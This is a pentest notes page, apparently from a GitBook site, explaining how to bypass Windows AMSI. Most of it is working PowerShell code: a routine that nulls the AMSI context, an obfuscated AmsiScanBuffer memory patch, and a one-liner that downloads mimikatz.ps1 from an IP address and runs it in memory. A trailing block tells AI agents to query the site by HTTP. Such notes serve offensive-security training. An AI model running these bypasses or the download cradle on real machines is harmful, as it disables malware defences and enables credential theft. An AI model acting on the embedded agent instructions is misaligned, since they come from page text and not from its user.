# Bypassing AMSI

Windows Antimalware Scan Interface (AMSI) allows any program to communicate with the Anti-Virus that communicates on the machine. Essentially a bunch of functions that programs can call **(amsi.dll).** This allows programs to be like hey amsi scan this file, then amsi will be like :thumbsup: or :thumbsdown:

Its built into PowerShell by default. So even though we're running scripts into memory, it's still getting passed through PowerShell which has AMSI so it stops the process from even happening.

## AMSI Scan Buffer 

{% embed url="<https://rastamouse.me/memory-patching-amsi-bypass/>" %}

With this technique, when **amsi.dll** gets loaded into memory we are going to find the location of the **amsi scan buffer function** and overwrite it in a way that makes it always return a clean file.

Test amsi

```powershell
Invoke-Expression "AMSI Test Sample: 7e72c3ce-861b-4339-8740-0ac1484c1386"
```

Clear the amsi context

```powershell
$a = [Ref].Assembly.GetTypes()
ForEach($b in $a) {if ($b.Name -like "*iUtils") {$c = $b}}
$d = $c.GetFields('NonPublic,Static')
ForEach($e in $d) {if ($e.Name -like "*Context") {$f = $e}}
$g = $f.GetValue($null)
[IntPtr]$ptr = $g
[Int32[]]$buf = @(0)
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)
```

```powershell
#Rasta-mouses Amsi-Scan-Buffer patch \n
$vahqn = @"
using System;
using System.Runtime.InteropServices;
public class vahqn {
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);
    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr kyjgnt, uint flNewProtect, out uint lpflOldProtect);
}
"@

Add-Type $vahqn

$kpvseop = [vahqn]::LoadLibrary("$([CHaR](97+37-37)+[chAr](109*100/100)+[Char]([ByTe]0x73)+[cHAr]([BytE]0x69)+[chAR](46+41-41)+[ChAr](100+67-67)+[CHAr]([ByTE]0x6c)+[ChAr]([byte]0x6c))")
$mgciek = [vahqn]::GetProcAddress($kpvseop, "$([cHaR]([ByTe]0x41)+[ChaR](109)+[ChAR]([BYTE]0x73)+[CHar](105+77-77)+[chAR](83+57-57)+[Char](99*6/6)+[CHar]([BYtE]0x61)+[CHAR](60+50)+[Char](66)+[cHAr]([bYTe]0x75)+[cHar]([BYtE]0x66)+[ChaR](102)+[CHAr]([BYTE]0x65)+[char](114*111/111))")
$p = 0
[vahqn]::VirtualProtect($mgciek, [uint32]5, 0x40, [ref]$p)
$cvgm = "0xB8"
$qqvf = "0x57"
$whib = "0x00"
$mvnn = "0x07"
$djza = "0x80"
$hgrw = "0xC3"
$cxgkz = [Byte[]] ($cvgm,$qqvf,$whib,$mvnn,+$djza,+$hgrw)
[System.Runtime.InteropServices.Marshal]::Copy($cxgkz, 0, $mgciek, 6)
```

Anything we run that doesn't touch the disk wont be caught by Windows Defender.

{% hint style="warning" %}
Any and all EDR solutions will catch this even if AMSI is bypassed
{% endhint %}

```
IEX(New-Object Net.WebClient).downloadString('http://10.9.254.6/mimikatz.ps1')
```

## AMSI.Fail

{% embed url="<https://amsi.fail/>" %}

Amsi.fail generates obfuscated PowerShell snippets that break or disable AMSI for the current process. So once your PowerShell process dies the AMSI bypass dies with it. This makes it better on real engagements because then you're not just[ disabling WIndows Defender](/post-exploitation/av-evasion/disabling-windows-defender.md)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pnpt.adot8.com/post-exploitation/av-evasion/bypassing-amsi.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.